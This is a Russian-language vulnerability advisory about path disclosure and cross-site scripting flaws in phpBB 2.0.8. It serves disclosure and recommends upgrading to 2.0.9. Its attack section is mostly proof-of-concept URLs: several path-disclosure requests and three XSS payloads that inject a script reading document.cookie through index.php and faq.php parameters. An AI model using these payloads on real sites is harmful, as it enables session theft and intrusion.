Несколько уязвимостей в phpBB

Дата публикации:
18.07.2004
Дата изменения:
20.10.2006
Всего просмотров:
3721
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: phpBB 2.0.8

Описание: Несколько уязвимостей в phpBB позволяют удаленному пользователю определить инсталляционный путь и выполнить XSS нападение.

1. Раскрытие пути:

http://localhost/phpbb208/index.php?category_rows=waraxe
http://localhost/phpbb208/faq.php?faq=w araxe
http://localhost/phpbb208/faq.php?mode=bbcode&faq=waraxe
http://localhost/phpbb208/profile.php?mode=viewprofile&u=2&ranksrow=waraxe
http://localhost/phpbb208/index.php?category_rows[0][cat_id]=1
<pre>
2. XSS:
<pre>
B1 - XSS in "index.php":

http://localhost/phpbb208/index.php?category_rows[0][cat_id]=1
&category_rows[0][cat_title]=waraxe<script>alert(document.cookie);
</script>&category_rows[0][cat_order]=99


B2 - XSS in "language\lang_english\lang_faq.php":

http://localhost/phpbb208/faq.php?
faq[0][0]=f00<script>alert(document.cookie);</script>bar&
faq[0][1]=waraxe


B3 - XSS in "language\lang_english\lang_bbcode.php ":

http://localhost/phpbb208/faq.php?mode=bbcode&
faq[0][0]=f00<script>alert(document.cookie);</script>bar
&faq[0][1]=waraxe

URL производителя: http://www.phpbb.com/

Решение:Установите последнюю версию форума (2.0.9): http://www.phpbb.com/downloads.php

Ссылки: XSS and path full path disclosure in PhpBB

или введите имя

CAPTCHA